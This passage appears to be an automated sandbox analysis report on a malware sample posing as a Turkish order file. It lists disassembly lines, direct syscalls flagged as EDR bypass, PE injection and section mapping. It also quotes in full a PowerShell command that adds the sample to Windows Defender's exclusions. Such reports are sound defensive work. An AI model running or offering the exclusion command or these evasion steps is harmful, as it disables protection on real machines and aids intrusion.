            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BE872 mov eax, dword ptr fs:[00000030h]5_2_017BE872
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6870 mov eax, dword ptr fs:[00000030h]5_2_017C6870
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6870 mov eax, dword ptr fs:[00000030h]5_2_017C6870
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01760854 mov eax, dword ptr fs:[00000030h]5_2_01760854
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734859 mov eax, dword ptr fs:[00000030h]5_2_01734859
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734859 mov eax, dword ptr fs:[00000030h]5_2_01734859
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01742840 mov ecx, dword ptr fs:[00000030h]5_2_01742840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov eax, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov eax, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov eax, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov ecx, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov eax, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01752835 mov eax, dword ptr fs:[00000030h]5_2_01752835
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018008C0 mov eax, dword ptr fs:[00000030h]5_2_018008C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A830 mov eax, dword ptr fs:[00000030h]5_2_0176A830
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D483A mov eax, dword ptr fs:[00000030h]5_2_017D483A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D483A mov eax, dword ptr fs:[00000030h]5_2_017D483A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BC810 mov eax, dword ptr fs:[00000030h]5_2_017BC810
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C8F9 mov eax, dword ptr fs:[00000030h]5_2_0176C8F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C8F9 mov eax, dword ptr fs:[00000030h]5_2_0176C8F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FA8E4 mov eax, dword ptr fs:[00000030h]5_2_017FA8E4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E8C0 mov eax, dword ptr fs:[00000030h]5_2_0175E8C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BC89D mov eax, dword ptr fs:[00000030h]5_2_017BC89D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730887 mov eax, dword ptr fs:[00000030h]5_2_01730887
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172CB7E mov eax, dword ptr fs:[00000030h]5_2_0172CB7E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728B50 mov eax, dword ptr fs:[00000030h]5_2_01728B50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEB50 mov eax, dword ptr fs:[00000030h]5_2_017DEB50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4B4B mov eax, dword ptr fs:[00000030h]5_2_017E4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4B4B mov eax, dword ptr fs:[00000030h]5_2_017E4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6B40 mov eax, dword ptr fs:[00000030h]5_2_017C6B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6B40 mov eax, dword ptr fs:[00000030h]5_2_017C6B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FAB40 mov eax, dword ptr fs:[00000030h]5_2_017FAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D8B42 mov eax, dword ptr fs:[00000030h]5_2_017D8B42
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EB20 mov eax, dword ptr fs:[00000030h]5_2_0175EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EB20 mov eax, dword ptr fs:[00000030h]5_2_0175EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F8B28 mov eax, dword ptr fs:[00000030h]5_2_017F8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F8B28 mov eax, dword ptr fs:[00000030h]5_2_017F8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804B00 mov eax, dword ptr fs:[00000030h]5_2_01804B00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EBFC mov eax, dword ptr fs:[00000030h]5_2_0175EBFC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BCBF0 mov eax, dword ptr fs:[00000030h]5_2_017BCBF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEBD0 mov eax, dword ptr fs:[00000030h]5_2_017DEBD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740BBE mov eax, dword ptr fs:[00000030h]5_2_01740BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740BBE mov eax, dword ptr fs:[00000030h]5_2_01740BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4BB0 mov eax, dword ptr fs:[00000030h]5_2_017E4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4BB0 mov eax, dword ptr fs:[00000030h]5_2_017E4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804A80 mov eax, dword ptr fs:[00000030h]5_2_01804A80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017ACA72 mov eax, dword ptr fs:[00000030h]5_2_017ACA72
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017ACA72 mov eax, dword ptr fs:[00000030h]5_2_017ACA72
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEA60 mov eax, dword ptr fs:[00000030h]5_2_017DEA60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740A5B mov eax, dword ptr fs:[00000030h]5_2_01740A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740A5B mov eax, dword ptr fs:[00000030h]5_2_01740A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01754A35 mov eax, dword ptr fs:[00000030h]5_2_01754A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01754A35 mov eax, dword ptr fs:[00000030h]5_2_01754A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA38 mov eax, dword ptr fs:[00000030h]5_2_0176CA38
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA24 mov eax, dword ptr fs:[00000030h]5_2_0176CA24
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EA2E mov eax, dword ptr fs:[00000030h]5_2_0175EA2E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BCA11 mov eax, dword ptr fs:[00000030h]5_2_017BCA11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176AAEE mov eax, dword ptr fs:[00000030h]5_2_0176AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176AAEE mov eax, dword ptr fs:[00000030h]5_2_0176AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730AD0 mov eax, dword ptr fs:[00000030h]5_2_01730AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01764AD0 mov eax, dword ptr fs:[00000030h]5_2_01764AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01764AD0 mov eax, dword ptr fs:[00000030h]5_2_01764AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738AA0 mov eax, dword ptr fs:[00000030h]5_2_01738AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738AA0 mov eax, dword ptr fs:[00000030h]5_2_01738AA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeMemory written: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: NULL target: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: NULL target: C:\Windows\SysWOW64\shutdown.exe protection: execute and read and writeJump to behavior
